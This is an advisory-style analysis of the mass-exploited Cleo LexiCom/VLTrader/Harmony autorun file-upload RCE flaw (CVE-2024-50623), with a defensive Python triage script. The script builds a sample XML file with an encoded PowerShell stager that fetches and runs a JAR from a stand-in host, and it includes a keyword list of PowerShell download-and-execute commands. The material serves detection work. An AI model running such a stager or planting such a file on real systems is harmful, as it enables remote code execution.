Full Report
Users of Cleo-managed file transfer software are being urged to ensure that their instances are not exposed to the internet following reports of mass exploitation of a vulnerability affecting fully patched systems. Cybersecurity company Huntress said it discovered evidence of threat actors exploiting the issue en masse on December 3, 2024. The vulnerability, which impacts Cleo's LexiCom,
Analysis Summary
# Vulnerability: Unauthenticated Remote Code Execution in Cleo File Transfer Software
## CVE Details
- CVE ID: CVE-2024-50623; a second vendor advisory covers a related vulnerability whose CVE assignment is still pending.
- CVSS Score: Not provided in the source; the flaw is described as unauthenticated Remote Code Execution (RCE).
- CWE: Unrestricted File Upload (CWE-434, Unrestricted Upload of File with Dangerous Type); inferred from the described behaviour rather than stated by the vendor.
## Affected Systems
- Products: Cleo LexiCom, Cleo VLTrader (written "VLTransfer" in some reporting), Cleo Harmony
- Versions: Up to and including 5.8.0.23 for all listed products; this includes builds carrying the initial CVE-2024-50623 patch, which the reports describe as still exploitable.
- Configurations: Instances exposed directly to the internet are at high risk.
## Vulnerability Description
The primary vulnerability (CVE-2024-50623) stems from an **unrestricted file upload** flaw: an unauthenticated attacker can use the product's network-facing file transfer interface to write files into the `autorun` sub-directory of the installation folder. Any file placed there is read, parsed and executed by the software without further interaction, so the file write becomes **Remote Code Execution (RCE)**.
A second, related vulnerability, also reachable without authentication and also leading to RCE, has been identified and is awaiting a CVE assignment. The patch released for CVE-2024-50623 is reported **not to fully mitigate** the underlying flaw, so instances carrying that patch must be treated as exploitable until the vendor ships a fix for the second issue.
## Exploitation
- Status: **Exploited in the wild** (Mass exploitation reported starting December 3, 2024).
- Complexity: Low (implied by successful unauthenticated mass exploitation; no official CVSS vector is given).
- Attack Vector: Network, unauthenticated.
## Impact
- Confidentiality: High (Likely enables data exfiltration after RCE is achieved).
- Integrity: High (Arbitrary code execution allows system modification).
- Availability: High (System compromise via RCE).
## Remediation
### Patches
- **CVE-2024-50623 Patch:** The initial patch does not fully resolve the issue. A complete fix was expected "later this week" relative to the article date; monitor the Cleo advisories for the specific fixed version and verify installed builds against it rather than assuming a patched state.
- **Second Vulnerability:** A patch for the second, separate RCE vulnerability is also pending.
### Workarounds
- **Crucial Strategy:** Users are strongly urged to **ensure their Cleo instances are not exposed to the internet.**
- Isolate affected servers from external network access pending confirmed, complete vendor patches.
## Detection
- **Indicators of Compromise (IOCs):** Observed exploitation dropped XML files into the Cleo installation directory that contained embedded PowerShell commands; these commands retrieved and executed a next-stage **Java Archive (JAR) file** from an attacker-controlled remote server.
- **Detection Methods and Tools:** Monitor the Cleo installation directories, in particular the `autorun` sub-directory, for unexpected file creation; XML files carrying script content are the pattern seen so far. On the host, alert on PowerShell processes launched by the Cleo service. On the network, look for outbound downloads of JAR files from unfamiliar endpoints shortly after such file writes.
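The file-system side of that detection, as an added example that is not part of the original advisory or of Cleo's or Huntress's code: a Python triage script that walks an autorun directory, flags files containing PowerShell download-and-execute vocabulary, decodes `-EncodedCommand` payloads (base64 of UTF-16LE) so markers hidden inside them are seen as well, and extracts any URL that points at a JAR. The two sample files, the host-definition XML shape, the marker list and the 203.0.113.10 address are constructed for the demonstration and are not the observed attacker payload.

```python
"""Triage files dropped into a Cleo-style autorun directory.

Cleo LexiCom, VLTrader and Harmony execute whatever lands in the autorun
sub-directory. The reported intrusions used XML files wrapping PowerShell
that fetched a second-stage JAR. This added example (not vendor code) flags
that pattern; the sample files it builds are constructed, not real IOCs.
"""
import base64
import re
import tempfile
from pathlib import Path

# PowerShell download-and-execute vocabulary that has no business inside a
# file-transfer host definition (assumption: a legitimate Cleo autorun file
# carries none of these).
PS_MARKERS = re.compile(
    r"(?i)(powershell(?:\.exe)?|invoke-webrequest|invoke-expression"
    r"|start-process|downloadfile|downloadstring|net\.webclient"
    r"|-encodedcommand|-enc\b|\biex\b|\biwr\b)"
)
# "-e / -enc / -EncodedCommand <base64>" as written in PowerShell one-liners.
ENCODED_RE = re.compile(r"(?i)-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})")
URL_RE = re.compile(r"(?i)https?://[^\s\"'<>]+")


def decode_encoded_commands(text):
    """Return the plaintext of every -EncodedCommand argument found in text."""
    decoded = []
    for m in ENCODED_RE.finditer(text):
        try:
            # PowerShell encodes the command as base64 over UTF-16LE.
            decoded.append(base64.b64decode(m.group(1), validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not decodable; the raw "-enc" marker is still flagged below
    return decoded


def analyze_file(path):
    """Classify one autorun file and return the evidence as a dict."""
    path = Path(path)
    text = path.read_text(encoding="utf-8", errors="replace")
    decoded = decode_encoded_commands(text)
    searchable = "\n".join([text, *decoded])  # look inside decoded payloads too
    markers = sorted({m.group(1).lower() for m in PS_MARKERS.finditer(searchable)})
    urls = sorted(set(URL_RE.findall(searchable)))
    jar_urls = [u for u in urls if ".jar" in u.lower()]
    return {
        "file": path.name,
        "is_xml": text.lstrip().startswith("<"),
        "markers": markers,
        "decoded_commands": decoded,
        "urls": urls,
        "jar_urls": jar_urls,
        # A JAR download from inside a host definition is the reported
        # behaviour; PowerShell vocabulary on its own is also worth an alert.
        "suspicious": bool(markers) or bool(jar_urls),
    }


def scan_autorun(autorun_dir):
    """Analyze every regular file: autorun executes any file type, not only XML."""
    return [analyze_file(p) for p in sorted(Path(autorun_dir).iterdir()) if p.is_file()]


def build_sample_dir():
    """Write two constructed files to a temp dir: a benign host definition and
    one mimicking the reported pattern (XML wrapping a PowerShell stager)."""
    d = Path(tempfile.mkdtemp(prefix="cleo-autorun-"))
    (d / "partner-sftp.xml").write_text(
        '<?xml version="1.0"?>\n<Host alias="partner-sftp">\n'
        '  <Property name="inbox">/inbound</Property>\n</Host>\n', encoding="utf-8")
    # Constructed stager; 203.0.113.10 is RFC 5737 documentation address space.
    stage2 = ("Invoke-WebRequest -Uri http://203.0.113.10/stage2.jar -OutFile $env:TEMP\\s.jar; "
              "Start-Process java -ArgumentList '-jar',$env:TEMP\\s.jar")
    enc = base64.b64encode(stage2.encode("utf-16-le")).decode("ascii")
    (d / "healthcheck.xml").write_text(
        '<?xml version="1.0"?>\n<Host alias="healthcheck">\n'
        f'  <Command>powershell -nop -w hidden -enc {enc}</Command>\n</Host>\n', encoding="utf-8")
    return d


if __name__ == "__main__":
    for r in scan_autorun(build_sample_dir()):
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{flag:10} {r['file']} markers={r['markers']} jar={r['jar_urls']}")
```

Point `scan_autorun` at the real `autorun` path (and at a diff of the installation directory against a known-good baseline) rather than the temp directory the demo builds. A hit on `jar_urls` is the strongest signal, but any PowerShell vocabulary inside a host definition should page someone, because the software executes the file the moment it lands.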
## References
- Vendor Advisory (CVE-2024-50623): https://support.cleo.com/hc/en-us/articles/27140294267799-Cleo-Product-Security-Advisory-CVE-2024-50623
- Vendor Advisory (CVE Pending): https://support.cleo.com/hc/en-us/articles/28408134019735-Cleo-Product-Security-Advisory-CVE-Peding
- Huntress Threat Advisory: https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild